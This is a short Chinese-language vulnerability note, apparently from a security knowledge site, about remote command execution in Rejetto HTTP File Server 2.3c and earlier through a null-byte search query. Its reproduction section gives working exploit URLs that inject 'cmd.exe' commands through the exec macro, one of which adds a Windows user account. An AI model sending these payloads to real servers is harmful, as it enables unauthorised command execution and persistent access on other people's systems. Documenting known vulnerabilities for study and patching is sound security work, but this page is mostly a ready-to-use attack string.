menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 062-Hfs chevron_right 001-Hfs 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-Hfs 远程命令执行漏洞.md
    559 B / 2021-07-17 00:01:24
        # Hfs 远程命令执行漏洞
    
    ### 一、漏洞简介
    
    Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
    
    ### 二、漏洞影响
    
    2.3c以前的2.3x版本
    
    ### 三、复现过程
    
    `http://url:8080/?search==%00{.exec|cmd.exe /c [Command-String].}`
    
    `http://url:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}`
    
    links
    file_download